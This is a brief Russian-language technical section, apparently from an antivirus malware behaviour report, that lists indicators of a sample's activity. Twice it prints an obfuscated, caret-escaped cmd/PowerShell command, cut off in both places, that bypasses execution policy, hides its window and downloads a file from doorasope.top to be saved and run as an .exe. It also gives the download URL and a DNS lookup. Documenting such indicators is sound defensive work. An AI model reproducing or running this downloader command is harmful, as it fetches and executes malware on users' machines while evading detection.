Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Pow^er^sHeLl.^EXe -eXEcUti^onpOlicY^ by^paS^s -nOpro^f^IL^E ^-W^IndO^w^STyLE hi^Dd^En (^nE^w-Ob^JeC^t SYS^t^Em.^ne^t.we^bCLI^e^N^T).DoWnLO^AdFi^l^E^('http://www.doorasope.top/rea...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "Pow^er^sHeLl.^EXe -eXEcUti^onpOlicY^ by^paS^s -nOpro^f^IL^E ^-W^IndO^w^STyLE hi^Dd^En (^nE^w-Ob^JeC^t SYS^t^Em.^ne^t.we^bCLI^e^N^T).DoWnLO^AdFi^l^E^('http://www.doorasope.top/rea...' (со скрытым окном)